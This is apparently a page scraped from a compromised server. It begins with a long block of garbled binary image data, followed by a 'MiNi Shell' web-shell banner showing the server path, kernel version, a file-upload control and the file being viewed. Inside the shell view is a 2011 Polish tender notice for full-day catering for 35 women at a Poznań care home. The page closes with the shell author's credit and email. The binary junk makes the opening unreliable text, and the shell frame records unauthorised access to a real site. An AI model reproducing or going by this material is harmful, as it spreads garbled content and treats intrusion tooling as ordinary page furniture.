JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111103/363484-N-2011.html

<p class="kh_header"><b>Poznań: przygotowanie i dostarczenie całodziennego wyżywienia dla 35 mieszkanek Domu Pomocy Społecznej przy ul. Niedziałkowskiego 22 w Poznaniu</b><br>
<b>Numer ogłoszenia: 363484 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej im. bł. Edmunda Bojanowskiego , ul. Mieczysława Niedziałkowskiego 22, 61-578 Poznań, woj. wielkopolskie, tel. 061 8331941, faks 061 8331941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpspoznan.pl;   http://bip.city.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie i dostarczenie całodziennego wyżywienia dla 35 mieszkanek Domu Pomocy Społecznej przy ul. Niedziałkowskiego 22 w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przygotowanie i dostarczanie całodziennego wyżywienia dla 35 mieszkanek Domu Pomocy Społecznej przy ul. Niedziałkowskiego 22 w Poznaniu.
2.Całodzienne wyżywienie obejmuje śniadania, obiady, podwieczorki i kolacje.
3.W związku z faktem, ze posiłki spożywać będą kobiety, w większości powyżej 60 roku życia, Zamawiający wymaga aby wszystkie posiłki sporządzone były zgodnie z normami żywienia dla tej grupy wiekowej.
4.Wszystkie posiłki powinny spełniać wymagania tzw. lekkiej diety, tj. zawierać minimum 2 300 kcal dziennie na 1 osobę, z uwzględnieniem następującego, procentowego rozdziału kaloryczności:
1.	śniadanie - 30 procent (z ogólnej ilości 2 300 kcal),
2.	obiad - 40 procent,
3.	podwieczorek - 5 do 10 procent,
4.	kolacja 20 do 25 procent.
5.W każdym posiłku musi znajdować się pełnowartościowe białko zwierzęce.
6.Posiłki muszą być urozmaicone w cyklu 10 - dniowym. 
7.Produkty służące do obkładu pieczywa (np. szynka, kiełbasa, ser żółty itp.) oraz pieczywo z wyłączeniem bułek muszą być pokrojone.
8.Śniadania, obiady i kolacje Wykonawca zobowiązany jest zaproponować w opracowanym jadłospisie 10-dniowym (dekadowym), w dwóch zestawach do wyboru.
9.W trakcie realizacji zamówienia Wykonawca zobowiązany będzie do podania jadłospisu na kolejne 10 dni, z co najmniej 3 - dniowym wyprzedzeniem, określającego gramaturę oraz kaloryczność potraw w poszczególnych wariantach. 
10.Zamawiający wymaga aby w skład śniadania wchodziły 4 rodzaje pieczywa oraz napoje - mleko, herbata z cukrem, kawa zbożowa z mlekiem oraz kakao (dokładne ilości produktów podano w pkt. 18 i 19).
11.Wymaga się aby przynajmniej jeden raz w tygodniu mieszkanki otrzymały kolację na ciepło.
12.Zamawiający wymaga aby codzienne obiady składały się z dwóch dań, tj. zupy i dania głównego oraz z napoju.
13.Wymaga się aby dodatki do głównego dania obiadowego były gotowane lub tarte, np. tarte buraki, gotowana marchew, kalafior czy brukselka itp. 
14.Zamawiający wymaga aby przynajmniej 4 razy w tygodniu były serwowane główne dania obiadowe mięsne.
15.Zamawiający zastrzega sobie prawo zamówienia mniejszej ilości posiłków. O dokładnej ilości zamawianych posiłków Zamawiający powiadomi Wykonawcę najpóźniej do godz. 9.00 w dniu, którego zamówienie dotyczy, z podaniem informacji o ilości posiłków zamawianych w poszczególnych wariantach.
16.Zamawiający zastrzega sobie prawo zamówienia, w ramach ilości posiłków zapotrzebowanych na dany dzień, posiłków dla osób z dietą cukrzycową. O dokładnej ilości dań dla osób z dietą cukrzycową Zamawiający powiadomi Wykonawcę najpóźniej do godz. 9.00 w dniu, którego zamówienie dotyczy. 
17.Zamawiający nie wymaga porcjowania posiłków - rozdziału posiłków na porcje Zamawiający dokona we własnym zakresie korzystając z posiadanej zastawy stołowej. 
18.Zamawiający wymaga ponadto, aby Wykonawca w ramach niniejszego zamówienia dostarczał codziennie następujące produkty: 
1.pieczywo - 4 rodzaje pieczywa tj.: chleb razowy - 2 bochenki o wadze 600 g każdy, chleb typu baltonowskiego (pieczywo mieszane) - 4 bochenki o wadze 500 g każdy, chleb typu kawiorek (pieczywo pszenne) - 6 bochenków o wadze 300 g każdy oraz bułki tradycyjne - 25 sztuk,
2.mleko - o zawartości tłuszczu 3,2 procent - w ilości 15 litrów każdego dnia tygodnia z wyjątkiem wtorków i czwartków. We wtorki i czwartki Wykonawca zobowiązany jest dostarczyć 10 litrów mleka, z pozostałych  5 litrów Wykonawca przygotuje kaszkę mannę na ciepło i dostarczy razem z pozostałymi posiłkami do godz. 11.30 danego dnia.
3.masło - typu extra o zawartości tłuszczu 82 procent - w ilości 6 kostek o wadze 250 g każda 
19.Zamawiający wymaga aby Wykonawca, w ramach niniejszego zamówienia dostarczał comiesięcznie następujące produkty:
1.kasza manna - 9 kg,
2.dżem niskosłodzony o zróżnicowanych smakach (np. truskawka, wiśnia, brzoskwinia)- 10 słoików po 250 g każdy,
3.margaryna roślinna typu Palma lub równoważna - w ilości 3 kostek o wadze 250 g każda, 
4.cukier - 35 kg,
5.herbata czarna ekspresowa typu Posti lub równoważna - 10 paczek po 100 sztuk torebek każda,
6.kawa naturalna typu Prima Finezja lub równoważna - 8 opakowań po 250 g każde,
7.kawa zbożowa typu Inka lub równoważna - 8 kg,
8.kakao rozpuszczalne typu Puchatek lub równoważne - 6 opakowań po 300 g każde,
9.musztarda typu stołowa - 3 słoiki po 225 g każdy,
10.ketchup łagodny typu Kotlin lub równoważny - 2 sztuki po 500 g każdy,
11.majonez typu Winiary  lub równoważny - 3 litry,
12.ciasteczka kruche domowe - 3 kg, 
13.ryż biały, łuskany - 1 kg, 
14.syrop owocowy  typu Łowicz lub równoważny o zróżnicowanych smakach (np. truskawka, wiśnia, malina) - 2 butelki o pojemności od 420 ml do 500 ml ( w zależności od producenta) każda
20.Całodzienne wyżywienie musi być dostarczane do siedziby Zamawiającego codziennie, również  w niedziele i święta do godz. 11.30.
21.Produkty, o których mowa w pkt.18 muszą być dostarczane codziennie, razem z całodziennym wyżywieniem, do godz. 11.30.
22.Produkty, o których mowa w pkt.19 muszą być dostarczone raz w miesiącu, jednorazowo, do 5-go dnia miesiąca, po wcześniejszym uzgodnieniu dokładnego terminu z Zamawiającym.
23.Cenę za dostawę artykułów wymienionych w pkt. 18 i pkt.19 Wykonawca ma obowiązek wkalkulować w koszty dostarczenia całodziennego wyżywienia.
24.Wykonawca jest zobowiązany do zapewnienia próbki każdej składowej części potrawy, które pobierane będą po porcjowaniu i przechowywane u Zamawiającego na zasadach określonych w rozporządzeniu Ministra Zdrowia z dnia 17 kwietnia 2007 r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego (Dz. U. Nr 80, poz. 545).
25.Wartość próbek żywności Wykonawca ma obowiązek wkalkulować w cenę całodziennego wyżywienia.
26.Zamawiający, w ramach maksymalnego wynagrodzenia należnego Wykonawcy określonego w umowie, w przypadku zaoszczędzenia środków pieniężnych w trakcie realizacji przedmiotowego zamówienia wynikającego z zamawiania mniejszej ilości posiłków w poszczególnych miesiącach, zastrzega sobie prawo do zamówienia u Wykonawcy dodatkowych posiłków w związku z organizacją imprez okolicznościowych oraz świąt Wielkanocnych i Bożego Narodzenia.  
27.Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów sanitarno-epidemiologicznych podczas realizacji niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1.działania siły wyższej lub wystąpienia stanu wyższej konieczności,
2.zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
3.zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
4.omyłek pisarskich lub błędów rachunkowych,
5.mających na celu wyjaśnienie wątpliwości dotyczących treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
6.jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
7.innych zmian korzystnych dla Zamawiającego, w tym polegających na zmianie elementów zamówienia na elementy o lepszych lub odpowiedniejszych parametrach, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.poznan.pl/bip/public/bip/zampub.html?co=print&za_id=19212<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej im. bł. Edmunda Bojanowskiego, ul. Niedziałkowskiego 22, 61-578 Poznań, II piętro, pokój nr 1 Księgowość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 10:00, miejsce: siedziba Domu Pomocy Społecznej w Poznaniu ul. Niedziałkowskiego 22, pokój 1 - Ksigowość, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com